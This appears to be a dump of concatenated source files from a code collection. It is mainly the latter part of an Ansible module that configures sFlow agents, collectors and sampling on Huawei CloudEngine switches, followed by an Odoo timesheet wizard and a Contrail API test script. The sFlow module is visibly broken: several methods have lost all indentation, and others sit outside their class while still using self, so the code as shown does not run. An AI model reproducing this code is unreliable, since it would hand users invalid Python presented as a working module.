            conf_str = conf_str.replace("<meth></meth>", "")
        rcv_xml = get_nc_config(self.module, conf_str)
        # empty <data/> means no sFlow configuration exists
        if "<data/>" in rcv_xml:
            return sflow_dict
        # strip newlines and namespace declarations so plain path lookups work
        xml_str = rcv_xml.replace('\r', '').replace('\n', '').\
            replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
            replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
        root = ElementTree.fromstring(xml_str)
        # get source info
        srcs = root.findall("data/sflow/sources/source")
        if srcs:
            for src in srcs:
                attrs = dict()
                for attr in src:
                    if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
                        attrs[attr.tag] = attr.text
                sflow_dict["source"].append(attrs)
        # get agent info
        # NOTE: Element truthiness depends on child count, so an element with
        # no children is skipped here (same for sampling/counter/export below)
        agent = root.find("data/sflow/agents/agent")
        if agent:
            for attr in agent:
                if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
                    sflow_dict["agent"][attr.tag] = attr.text
        # get collector info
        collectors = root.findall("data/sflow/collectors/collector")
        if collectors:
            for collector in collectors:
                attrs = dict()
                for attr in collector:
                    if attr.tag in ["collectorID", "family", "ipv4Addr", "ipv6Addr",
                                    "vrfName", "datagramSize", "port", "description", "meth"]:
                        attrs[attr.tag] = attr.text
                sflow_dict["collector"].append(attrs)
        # get sampling info
        sample = root.find("data/sflow/samplings/sampling")
        if sample:
            for attr in sample:
                if attr.tag in ["ifName", "collectorID", "direction", "length", "rate"]:
                    sflow_dict["sampling"][attr.tag] = attr.text
        # get counter info
        counter = root.find("data/sflow/counters/counter")
        if counter:
            for attr in counter:
                if attr.tag in ["ifName", "collectorID", "interval"]:
                    sflow_dict["counter"][attr.tag] = attr.text
        # get export info
        export = root.find("data/sflow/exports/export")
        if export:
            for attr in export:
                if attr.tag == "ExportRoute":
                    sflow_dict["export"][attr.tag] = attr.text
        return sflow_dict
def config_agent(self):
"""configures sFlow agent"""
xml_str = ''
if not self.agent_ip:
return xml_str
self.agent_version = get_ip_version(self.agent_ip)
if not self.agent_version:
self.module.fail_json(msg="Error: agent_ip is invalid.")
if self.state == "present":
if self.agent_ip != self.sflow_dict["agent"].get("ipv4Addr") \
and self.agent_ip != self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="merge">'
xml_str += '<family>%s</family>' % self.agent_version
if self.agent_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ip %s" % self.agent_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ipv6 %s" % self.agent_ip)
xml_str += '</agent></agents>'
else:
if self.agent_ip == self.sflow_dict["agent"].get("ipv4Addr") \
or self.agent_ip == self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="delete"></agent></agents>'
self.updates_cmd.append("undo sflow agent")
return xml_str
def config_source(self):
"""configures the source IP address for sFlow packets"""
xml_str = ''
if not self.source_ip:
return xml_str
self.source_version = get_ip_version(self.source_ip)
if not self.source_version:
self.module.fail_json(msg="Error: source_ip is invalid.")
src_dict = dict()
for src in self.sflow_dict["source"]:
if src.get("family") == self.source_version:
src_dict = src
break
if self.state == "present":
if self.source_ip != src_dict.get("ipv4Addr") \
and self.source_ip != src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="merge">'
xml_str += '<family>%s</family>' % self.source_version
if self.source_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.source_ip
self.updates_cmd.append("sflow source ip %s" % self.source_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.source_ip
self.updates_cmd.append(
"sflow source ipv6 %s" % self.source_ip)
xml_str += '</source ></sources>'
else:
if self.source_ip == src_dict.get("ipv4Addr"):
xml_str += '<sources><source operation="delete"><family>ipv4</family></source ></sources>'
self.updates_cmd.append("undo sflow source ip %s" % self.source_ip)
elif self.source_ip == src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="delete"><family>ipv6</family></source ></sources>'
self.updates_cmd.append("undo sflow source ipv6 %s" % self.source_ip)
return xml_str
    def config_collector(self):
        """Create, update or delete an sFlow collector via netconf.

        Returns the netconf fragment for the change, or '' when nothing needs
        to change. The long elif chain below is an ordered change-detection
        cascade: first difference found sets change=True; the literal values
        compared against ("_public_", "6343", "1400", "meth") mirror the
        device defaults stated in DOCUMENTATION.
        """
        xml_str = ''
        if not self.collector_id:
            return xml_str
        # present requires an address; absent may match on id alone
        if self.state == "present" and not self.collector_ip:
            return xml_str
        if self.collector_ip:
            self.collector_version = get_ip_version(self.collector_ip)
            if not self.collector_version:
                self.module.fail_json(msg="Error: collector_ip is invalid.")
        # get collector dict
        exist_dict = dict()
        for collector in self.sflow_dict["collector"]:
            if collector.get("collectorID") == self.collector_id:
                exist_dict = collector
                break
        change = False
        if self.state == "present":
            if not exist_dict:
                change = True
            elif self.collector_version != exist_dict.get("family"):
                change = True
            elif self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
                change = True
            elif self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
                change = True
            elif self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
                change = True
            elif not self.collector_ip_vpn and exist_dict.get("vrfName") != "_public_":
                change = True
            elif self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
                change = True
            elif not self.collector_udp_port and exist_dict.get("port") != "6343":
                change = True
            elif self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
                change = True
            elif not self.collector_datagram_size and exist_dict.get("datagramSize") != "1400":
                change = True
            elif self.collector_meth and self.collector_meth != exist_dict.get("meth"):
                change = True
            elif not self.collector_meth and exist_dict.get("meth") and exist_dict.get("meth") != "meth":
                change = True
            elif self.collector_description and self.collector_description != exist_dict.get("description"):
                change = True
            elif not self.collector_description and exist_dict.get("description"):
                change = True
            else:
                pass
        else:  # absent
            # deletion only proceeds when every supplied attribute matches
            # the existing collector entry
            # collector not exist
            if not exist_dict:
                return xml_str
            if self.collector_version and self.collector_version != exist_dict.get("family"):
                return xml_str
            if self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
                return xml_str
            if self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
                return xml_str
            if self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
                return xml_str
            if self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
                return xml_str
            if self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
                return xml_str
            if self.collector_meth and self.collector_meth != exist_dict.get("meth"):
                return xml_str
            if self.collector_description and self.collector_description != exist_dict.get("description"):
                return xml_str
            change = True
        if not change:
            return xml_str
        # update or delete
        if self.state == "absent":
            xml_str += '<collectors><collector operation="delete"><collectorID>%s</collectorID>' % self.collector_id
            self.updates_cmd.append("undo collector %s" % self.collector_id)
        else:
            xml_str += '<collectors><collector operation="merge"><collectorID>%s</collectorID>' % self.collector_id
            # cmd accumulates the equivalent CLI line for updates_cmd
            cmd = "sflow collector %s" % self.collector_id
            xml_str += '<family>%s</family>' % self.collector_version
            if self.collector_version == "ipv4":
                cmd += " ip %s" % self.collector_ip
                xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.collector_ip
            else:
                cmd += " ipv6 %s" % self.collector_ip
                xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.collector_ip
            if self.collector_ip_vpn:
                cmd += " vpn-instance %s" % self.collector_ip_vpn
                xml_str += '<vrfName>%s</vrfName>' % self.collector_ip_vpn
            if self.collector_datagram_size:
                cmd += " length %s" % self.collector_datagram_size
                xml_str += '<datagramSize>%s</datagramSize>' % self.collector_datagram_size
            if self.collector_udp_port:
                cmd += " udp-port %s" % self.collector_udp_port
                xml_str += '<port>%s</port>' % self.collector_udp_port
            if self.collector_description:
                cmd += " description %s" % self.collector_description
                xml_str += '<description>%s</description>' % self.collector_description
            else:
                # empty element clears any existing description
                xml_str += '<description></description>'
            if self.collector_meth:
                if self.collector_meth == "enhanced":
                    cmd += " enhanced"
                xml_str += '<meth>%s</meth>' % self.collector_meth
            self.updates_cmd.append(cmd)
            xml_str += "</collector></collectors>"
        return xml_str
    def config_sampling(self):
        """Configure flow sampling (collector list, rate, length, direction)
        on self.sflow_interface.

        Returns the netconf fragment, or '' when nothing needs to change.
        Side effect: pushes 'interface ...' plus the changed lines onto
        updates_cmd (popped again if no attribute changed).
        """
        xml_str = ''
        if not self.sflow_interface:
            return xml_str
        if not self.sflow_dict["sampling"] and self.state == "absent":
            return xml_str
        self.updates_cmd.append("interface %s" % self.sflow_interface)
        if self.state == "present":
            xml_str += '<samplings><sampling operation="merge"><ifName>%s</ifName>' % self.sflow_interface
        else:
            xml_str += '<samplings><sampling operation="delete"><ifName>%s</ifName>' % self.sflow_interface
        # sample_collector: merge requested ids with the device's id list
        if self.sample_collector:
            # "invalid" is the device's placeholder for no collector bound
            if self.sflow_dict["sampling"].get("collectorID") \
                    and self.sflow_dict["sampling"].get("collectorID") != "invalid":
                existing = self.sflow_dict["sampling"].get("collectorID").split(',')
            else:
                existing = list()
            if self.state == "present":
                diff = list(set(self.sample_collector) - set(existing))
                if diff:
                    self.updates_cmd.append(
                        "sflow sampling collector %s" % ' '.join(diff))
                    new_set = list(self.sample_collector + existing)
                    xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
            else:
                same = list(set(self.sample_collector) & set(existing))
                if same:
                    self.updates_cmd.append(
                        "undo sflow sampling collector %s" % ' '.join(same))
                    xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
        # sample_rate: only emit when it differs from (or matches, for absent)
        # the device's current value
        if self.sample_rate:
            exist = bool(self.sample_rate == self.sflow_dict["sampling"].get("rate"))
            if self.state == "present" and not exist:
                self.updates_cmd.append(
                    "sflow sampling rate %s" % self.sample_rate)
                xml_str += '<rate>%s</rate>' % self.sample_rate
            elif self.state == "absent" and exist:
                self.updates_cmd.append(
                    "undo sflow sampling rate %s" % self.sample_rate)
                xml_str += '<rate>%s</rate>' % self.sample_rate
        # sample_length: same pattern as sample_rate
        if self.sample_length:
            exist = bool(self.sample_length == self.sflow_dict["sampling"].get("length"))
            if self.state == "present" and not exist:
                self.updates_cmd.append(
                    "sflow sampling length %s" % self.sample_length)
                xml_str += '<length>%s</length>' % self.sample_length
            elif self.state == "absent" and exist:
                self.updates_cmd.append(
                    "undo sflow sampling length %s" % self.sample_length)
                xml_str += '<length>%s</length>' % self.sample_length
        # sample_direction: normalise "both" <-> [inbound, outbound] on both
        # sides, then diff/intersect like the collector list
        if self.sample_direction:
            direction = list()
            if self.sample_direction == "both":
                direction = ["inbound", "outbound"]
            else:
                direction.append(self.sample_direction)
            existing = list()
            if self.sflow_dict["sampling"].get("direction"):
                if self.sflow_dict["sampling"].get("direction") == "both":
                    existing = ["inbound", "outbound"]
                else:
                    existing.append(
                        self.sflow_dict["sampling"].get("direction"))
            if self.state == "present":
                diff = list(set(direction) - set(existing))
                if diff:
                    new_set = list(set(direction + existing))
                    self.updates_cmd.append(
                        "sflow sampling %s" % ' '.join(diff))
                    if len(new_set) > 1:
                        new_dir = "both"
                    else:
                        new_dir = new_set[0]
                    xml_str += '<direction>%s</direction>' % new_dir
            else:
                same = list(set(existing) & set(direction))
                if same:
                    self.updates_cmd.append("undo sflow sampling %s" % ' '.join(same))
                    if len(same) > 1:
                        del_dir = "both"
                    else:
                        del_dir = same[0]
                    xml_str += '<direction>%s</direction>' % del_dir
        # if nothing was appended after <ifName>, no attribute changed:
        # undo the 'interface ...' update line and emit nothing
        if xml_str.endswith("</ifName>"):
            self.updates_cmd.pop()
            return ""
        xml_str += '</sampling></samplings>'
        return xml_str
    def config_counter(self):
        """Configure counter sampling (collector list, interval) on
        self.sflow_interface.

        Mirrors config_sampling(): returns the netconf fragment, or '' when
        nothing needs to change; pops the 'interface ...' line from
        updates_cmd when no attribute changed.
        """
        xml_str = ''
        if not self.sflow_interface:
            return xml_str
        if not self.sflow_dict["counter"] and self.state == "absent":
            return xml_str
        self.updates_cmd.append("interface %s" % self.sflow_interface)
        if self.state == "present":
            xml_str += '<counters><counter operation="merge"><ifName>%s</ifName>' % self.sflow_interface
        else:
            xml_str += '<counters><counter operation="delete"><ifName>%s</ifName>' % self.sflow_interface
        # counter_collector: merge requested ids with the device's id list
        # ("invalid" means no collector bound)
        if self.counter_collector:
            if self.sflow_dict["counter"].get("collectorID") \
                    and self.sflow_dict["counter"].get("collectorID") != "invalid":
                existing = self.sflow_dict["counter"].get("collectorID").split(',')
            else:
                existing = list()
            if self.state == "present":
                diff = list(set(self.counter_collector) - set(existing))
                if diff:
                    self.updates_cmd.append("sflow counter collector %s" % ' '.join(diff))
                    new_set = list(self.counter_collector + existing)
                    xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
            else:
                same = list(set(self.counter_collector) & set(existing))
                if same:
                    self.updates_cmd.append(
                        "undo sflow counter collector %s" % ' '.join(same))
                    xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
        # counter_interval: only emit when it differs from (present) or
        # matches (absent) the device's current value
        if self.counter_interval:
            exist = bool(self.counter_interval == self.sflow_dict["counter"].get("interval"))
            if self.state == "present" and not exist:
                self.updates_cmd.append(
                    "sflow counter interval %s" % self.counter_interval)
                xml_str += '<interval>%s</interval>' % self.counter_interval
            elif self.state == "absent" and exist:
                self.updates_cmd.append(
                    "undo sflow counter interval %s" % self.counter_interval)
                xml_str += '<interval>%s</interval>' % self.counter_interval
        # no attribute changed after <ifName>: undo the 'interface ...' line
        if xml_str.endswith("</ifName>"):
            self.updates_cmd.pop()
            return ""
        xml_str += '</counter></counters>'
        return xml_str
def config_export(self):
"""configure sflow export"""
xml_str = ''
if not self.export_route:
return xml_str
if self.export_route == "enable":
if self.sflow_dict["export"] and self.sflow_dict["export"].get("ExportRoute") == "disable":
xml_str = '<exports><export operation="delete"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("undo sflow export extended-route-data disable")
else: # disable
if not self.sflow_dict["export"] or self.sflow_dict["export"].get("ExportRoute") != "disable":
xml_str = '<exports><export operation="create"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("sflow export extended-route-data disable")
return xml_str
def config_assign(self):
"""configure assign"""
# assign sflow management-plane export rate-limit rate-limit [ slot slot-id ]
if self.rate_limit:
cmd = "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
cmd += " slot %s" % self.rate_limit_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
# assign forward enp sflow enable slot { slot-id | all }
if self.forward_enp_slot:
cmd = "assign forward enp sflow enable slot %s" % self.forward_enp_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
    def netconf_load_config(self, xml_str):
        """Wrap *xml_str* in the sFlow <config> envelope, push it over
        netconf, and mark the module as changed. No-op for empty input."""
        if not xml_str:
            return
        xml_cfg = """
<config>
    <sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
    </sflow>
</config>""" % xml_str
        self.netconf_set_config(xml_cfg, "SET_SFLOW")
        self.changed = True
def check_params(self):
    """Check all input params; calls self.module.fail_json on invalid input.

    Fixes over the original:
    - sample_length / counter_interval error messages named the wrong field;
    - the result of forward_enp_slot.lower() was discarded (no-op).
    """
    # check agent_ip
    if self.agent_ip:
        self.agent_ip = self.agent_ip.upper()
        if not check_ip_addr(self.agent_ip):
            self.module.fail_json(msg="Error: agent_ip is invalid.")

    # check source_ip
    if self.source_ip:
        self.source_ip = self.source_ip.upper()
        if not check_ip_addr(self.source_ip):
            self.module.fail_json(msg="Error: source_ip is invalid.")

    # collector parameters are only validated when a collector_id is given
    if self.collector_id:
        # check collector_ip and collector_ip_vpn
        if self.collector_ip:
            self.collector_ip = self.collector_ip.upper()
            if not check_ip_addr(self.collector_ip):
                self.module.fail_json(
                    msg="Error: collector_ip is invalid.")
            if self.collector_ip_vpn and not is_valid_ip_vpn(self.collector_ip_vpn):
                self.module.fail_json(
                    msg="Error: collector_ip_vpn is invalid.")

        # check collector_datagram_size ranges from 1024 to 8100
        if self.collector_datagram_size:
            if not self.collector_datagram_size.isdigit():
                self.module.fail_json(
                    msg="Error: collector_datagram_size is not digit.")
            if int(self.collector_datagram_size) < 1024 or int(self.collector_datagram_size) > 8100:
                self.module.fail_json(
                    msg="Error: collector_datagram_size is not ranges from 1024 to 8100.")

        # check collector_udp_port ranges from 1 to 65535
        if self.collector_udp_port:
            if not self.collector_udp_port.isdigit():
                self.module.fail_json(
                    msg="Error: collector_udp_port is not digit.")
            if int(self.collector_udp_port) < 1 or int(self.collector_udp_port) > 65535:
                self.module.fail_json(
                    msg="Error: collector_udp_port is not ranges from 1 to 65535.")

        # check collector_description 1 to 255 case-sensitive characters
        if self.collector_description:
            if self.collector_description.count(" "):
                self.module.fail_json(
                    msg="Error: collector_description should without spaces.")
            if len(self.collector_description) < 1 or len(self.collector_description) > 255:
                self.module.fail_json(
                    msg="Error: collector_description is not ranges from 1 to 255.")

    # check sflow_interface
    if self.sflow_interface:
        intf_type = get_interface_type(self.sflow_interface)
        if not intf_type:
            self.module.fail_json(msg="Error: intf_type is invalid.")
        if intf_type not in ['ge', '10ge', '25ge', '4x10ge', '40ge', '100ge', 'eth-trunk']:
            self.module.fail_json(
                msg="Error: interface %s is not support sFlow." % self.sflow_interface)

    # check sample_collector
    if self.sample_collector:
        self.sample_collector.sort()
        if self.sample_collector not in [["1"], ["2"], ["1", "2"]]:
            self.module.fail_json(
                msg="Error: sample_collector is invalid.")

    # check sample_rate ranges from 1 to 4294967295
    if self.sample_rate:
        if not self.sample_rate.isdigit():
            self.module.fail_json(
                msg="Error: sample_rate is not digit.")
        if int(self.sample_rate) < 1 or int(self.sample_rate) > 4294967295:
            self.module.fail_json(
                msg="Error: sample_rate is not ranges from 1 to 4294967295.")

    # check sample_length ranges from 18 to 512
    if self.sample_length:
        if not self.sample_length.isdigit():
            # BUGFIX: message previously said "sample_rate"
            self.module.fail_json(
                msg="Error: sample_length is not digit.")
        if int(self.sample_length) < 18 or int(self.sample_length) > 512:
            self.module.fail_json(
                msg="Error: sample_length is not ranges from 18 to 512.")

    # check counter_collector
    if self.counter_collector:
        self.counter_collector.sort()
        if self.counter_collector not in [["1"], ["2"], ["1", "2"]]:
            self.module.fail_json(
                msg="Error: counter_collector is invalid.")

    # counter_interval ranges from 10 to 4294967295
    if self.counter_interval:
        if not self.counter_interval.isdigit():
            self.module.fail_json(
                msg="Error: counter_interval is not digit.")
        if int(self.counter_interval) < 10 or int(self.counter_interval) > 4294967295:
            # BUGFIX: message previously said "sample_length"
            self.module.fail_json(
                msg="Error: counter_interval is not ranges from 10 to 4294967295.")

    # check rate_limit ranges from 100 to 1500 and check rate_limit_slot
    if self.rate_limit:
        if not self.rate_limit.isdigit():
            self.module.fail_json(msg="Error: rate_limit is not digit.")
        if int(self.rate_limit) < 100 or int(self.rate_limit) > 1500:
            self.module.fail_json(
                msg="Error: rate_limit is not ranges from 100 to 1500.")
        if self.rate_limit_slot and not self.rate_limit_slot.isdigit():
            self.module.fail_json(
                msg="Error: rate_limit_slot is not digit.")

    # check forward_enp_slot
    if self.forward_enp_slot:
        # BUGFIX: the lowered value was computed but never stored
        self.forward_enp_slot = self.forward_enp_slot.lower()
        if not self.forward_enp_slot.isdigit() and self.forward_enp_slot != "all":
            self.module.fail_json(
                msg="Error: forward_enp_slot is invalid.")
def get_proposed(self):
    """Record the requested (proposed) parameters in self.proposed."""
    # base config
    for key in ("agent_ip", "source_ip", "export_route"):
        val = getattr(self, key)
        if val:
            self.proposed[key] = val
    # rate_limit always carries its slot along, even when the slot is unset
    if self.rate_limit:
        self.proposed["rate_limit"] = self.rate_limit
        self.proposed["rate_limit_slot"] = self.rate_limit_slot
    if self.forward_enp_slot:
        self.proposed["forward_enp_slot"] = self.forward_enp_slot
    if self.collector_id:
        self.proposed["collector_id"] = self.collector_id
    # collector_ip likewise drags collector_ip_vpn with it
    if self.collector_ip:
        self.proposed["collector_ip"] = self.collector_ip
        self.proposed["collector_ip_vpn"] = self.collector_ip_vpn
    # remaining collector, sample and counter config
    for key in ("collector_datagram_size", "collector_udp_port",
                "collector_meth", "collector_description",
                "sflow_interface", "sample_collector", "sample_rate",
                "sample_length", "sample_direction",
                "counter_collector", "counter_interval"):
        val = getattr(self, key)
        if val:
            self.proposed[key] = val
    self.proposed["state"] = self.state
def get_existing(self):
    """Snapshot the device's current sFlow state into self.existing."""
    if self.config:
        if self.rate_limit:
            self.existing["rate_limit"] = get_rate_limit(self.config)
        if self.forward_enp_slot:
            self.existing["forward_enp_slot"] = get_forward_enp(
                self.config)

    if not self.sflow_dict:
        return

    # only record the pieces the user asked about
    for wanted, key in ((self.agent_ip, "agent"),
                        (self.source_ip, "source"),
                        (self.collector_id, "collector"),
                        (self.export_route, "export")):
        if wanted:
            self.existing[key] = self.sflow_dict[key]
    if self.sflow_interface:
        self.existing["sampling"] = self.sflow_dict["sampling"]
        self.existing["counter"] = self.sflow_dict["counter"]
def get_end_state(self):
    """Capture the device state after the change into self.end_state."""
    config = self.get_current_config()
    if config:
        if self.rate_limit:
            self.end_state["rate_limit"] = get_rate_limit(config)
        if self.forward_enp_slot:
            self.end_state["forward_enp_slot"] = get_forward_enp(config)

    sflow_dict = self.get_sflow_dict()
    if not sflow_dict:
        return

    # mirror get_existing(): only record what the user asked about
    for wanted, key in ((self.agent_ip, "agent"),
                        (self.source_ip, "source"),
                        (self.collector_id, "collector"),
                        (self.export_route, "export")):
        if wanted:
            self.end_state[key] = sflow_dict[key]
    if self.sflow_interface:
        self.end_state["sampling"] = sflow_dict["sampling"]
        self.end_state["counter"] = sflow_dict["counter"]
def work(self):
    """Main worker: validate input, diff desired vs. current state, push
    the change over netconf and/or CLI, and exit with the result dict."""
    self.check_params()

    self.sflow_dict = self.get_sflow_dict()
    self.config = self.get_current_config()
    self.get_existing()
    self.get_proposed()

    # deal present or absent
    xml_str = ''
    if self.export_route:
        xml_str += self.config_export()
    if self.agent_ip:
        xml_str += self.config_agent()
    if self.source_ip:
        xml_str += self.config_source()

    if self.state == "present":
        # when creating: configure the collector before the interface
        # sampling/counter that reference it
        if self.collector_id and self.collector_ip:
            xml_str += self.config_collector()
        if self.sflow_interface:
            xml_str += self.config_sampling()
            xml_str += self.config_counter()
    else:
        # when removing: detach interface config first, then the collector
        if self.sflow_interface:
            xml_str += self.config_sampling()
            xml_str += self.config_counter()
        if self.collector_id:
            xml_str += self.config_collector()

    if self.rate_limit or self.forward_enp_slot:
        self.config_assign()

    # 'assign' commands go through the CLI; everything else through netconf
    if self.commands:
        self.cli_load_config(self.commands)
        self.changed = True
    if xml_str:
        self.netconf_load_config(xml_str)
        self.changed = True

    self.get_end_state()

    self.results['changed'] = self.changed
    self.results['proposed'] = self.proposed
    self.results['existing'] = self.existing
    self.results['end_state'] = self.end_state
    if self.changed:
        self.results['updates'] = self.updates_cmd
    else:
        self.results['updates'] = list()

    # exit_json does not return
    self.module.exit_json(**self.results)
def main():
    """Module main: declare the Ansible argument spec and run the worker."""
    # All numeric options are declared as strings and range-checked in
    # check_params(); list options hold collector ids ('1'/'2').
    argument_spec = dict(
        agent_ip=dict(required=False, type='str'),
        source_ip=dict(required=False, type='str'),
        export_route=dict(required=False, type='str',
                          choices=['enable', 'disable']),
        rate_limit=dict(required=False, type='str'),
        rate_limit_slot=dict(required=False, type='str'),
        forward_enp_slot=dict(required=False, type='str'),
        collector_id=dict(required=False, type='str', choices=['1', '2']),
        collector_ip=dict(required=False, type='str'),
        collector_ip_vpn=dict(required=False, type='str'),
        collector_datagram_size=dict(required=False, type='str'),
        collector_udp_port=dict(required=False, type='str'),
        collector_meth=dict(required=False, type='str',
                            choices=['meth', 'enhanced']),
        collector_description=dict(required=False, type='str'),
        sflow_interface=dict(required=False, type='str'),
        sample_collector=dict(required=False, type='list'),
        sample_rate=dict(required=False, type='str'),
        sample_length=dict(required=False, type='str'),
        sample_direction=dict(required=False, type='str',
                              choices=['inbound', 'outbound', 'both']),
        counter_collector=dict(required=False, type='list'),
        counter_interval=dict(required=False, type='str'),
        state=dict(required=False, default='present',
                   choices=['present', 'absent'])
    )
    # merge in the CloudEngine connection arguments shared by all ce_* modules
    argument_spec.update(ce_argument_spec)
    module = Sflow(argument_spec)
    module.work()


if __name__ == '__main__':
    main()
|
kwailamchan/programming-languages | refs/heads/master | javascript/backbone/backbone-templates/backbone-fileupload/venvs/lib/python2.7/site-packages/django/contrib/localflavor/is_/__init__.py | 12133432 | |
helenst/django | refs/heads/master | django/conf/locale/it/__init__.py | 12133432 | |
jamesblunt/gunicorn | refs/heads/master | examples/frameworks/pylonstest/pylonstest/controllers/__init__.py | 12133432 | |
naousse/odoo | refs/heads/8.0 | addons/hr_timesheet_sheet/wizard/hr_timesheet_current.py | 381 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_timesheet_current_open(osv.osv_memory):
    """Transient wizard that opens the current user's timesheet(s)."""
    _name = 'hr.timesheet.current.open'
    _description = 'hr.timesheet.current.open'

    def open_timesheet(self, cr, uid, ids, context=None):
        """Return an act_window dict opening today's open timesheet(s).

        Raises an error dialog if the user has no linked employee record.
        """
        ts = self.pool.get('hr_timesheet_sheet.sheet')
        if context is None:
            context = {}
        view_type = 'form,tree'

        user_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id','=',uid)], context=context)
        if not len(user_ids):
            raise osv.except_osv(_('Error!'), _('Please create an employee and associate it with this user.'))

        # NOTE: `ids` (the wizard ids) is deliberately rebound here to the
        # open draft/new sheets whose date range covers today.
        ids = ts.search(cr, uid, [('user_id','=',uid),('state','in',('draft','new')),('date_from','<=',time.strftime('%Y-%m-%d')), ('date_to','>=',time.strftime('%Y-%m-%d'))], context=context)
        if len(ids) > 1:
            # several open sheets: show the list first, restricted to them
            view_type = 'tree,form'
            domain = "[('id','in',["+','.join(map(str, ids))+"]),('user_id', '=', uid)]"
        elif len(ids)==1:
            domain = "[('user_id', '=', uid)]"
        else:
            # NOTE(review): identical to the branch above — confirm whether a
            # different domain was intended for the zero-sheet case.
            domain = "[('user_id', '=', uid)]"
        value = {
            'domain': domain,
            'name': _('Open Timesheet'),
            'view_type': 'form',
            'view_mode': view_type,
            'res_model': 'hr_timesheet_sheet.sheet',
            'view_id': False,
            'type': 'ir.actions.act_window'
        }
        if len(ids) == 1:
            # jump straight into the single matching sheet
            value['res_id'] = ids[0]
        return value
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
aranjan7/contrail-controller-aranjan | refs/heads/master | src/config/api-server/tests/test_askip.py | 7 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from vnc_api.vnc_api import *
import uuid
def all(ip='10.84.13.34', port=8082, domain_name='my-domain',
        proj_name='my-proj', subnet='192.168.1.0', prefix=24, vn_name='my-fe',
        compute_node='a2s3.contrail.juniper.net'):
    """End-to-end smoke test of instance-IP allocation against a live
    Contrail API server (Python 2 script; shadows the builtin ``all``).

    Creates domain/project/ipam/network/vm/port objects, allocates an IP,
    then checks that re-reserving an allocated address fails and that
    reserving a free address succeeds.
    """
    vnc_lib = VncApi(username='admin', password='contrail123',
                     tenant_name='admin', api_server_host=ip,
                     api_server_port=port)

    domain = Domain(domain_name)
    vnc_lib.domain_create(domain)
    print 'Created domain'

    project = Project(proj_name, domain)
    vnc_lib.project_create(project)
    print 'Created Project'

    ipam = NetworkIpam('default-network-ipam', project, IpamType("dhcp"))
    vnc_lib.network_ipam_create(ipam)
    print 'Created network ipam'

    ipam = vnc_lib.network_ipam_read(fq_name=[domain_name, proj_name,
                                              'default-network-ipam'])
    print 'Read network ipam'

    # virtual network with one subnet drawn from the ipam
    ipam_sn_1 = IpamSubnetType(subnet=SubnetType(subnet, prefix))
    vn = VirtualNetwork(vn_name, project)
    vn.add_network_ipam(ipam, VnSubnetsType([ipam_sn_1]))
    vnc_lib.virtual_network_create(vn)
    net_obj = vnc_lib.virtual_network_read(id=vn.uuid)

    # instance-ip / vrouter / vm / port plumbing needed before allocation
    ip_obj = InstanceIp(name=str(uuid.uuid4()))
    ip_obj.uuid = ip_obj.name
    print 'Created Instance IP object ', ip_obj.uuid

    vrouter_obj = VirtualRouter(compute_node)
    vnc_lib.virtual_router_create(vrouter_obj)
    print 'Created Virtual Router object'

    vm_inst_obj = VirtualMachine(str(uuid.uuid4()))
    vm_inst_obj.uuid = vm_inst_obj.name
    vnc_lib.virtual_machine_create(vm_inst_obj)
    vrouter_obj.add_virtual_machine(vm_inst_obj)
    vnc_lib.virtual_router_update(vrouter_obj)

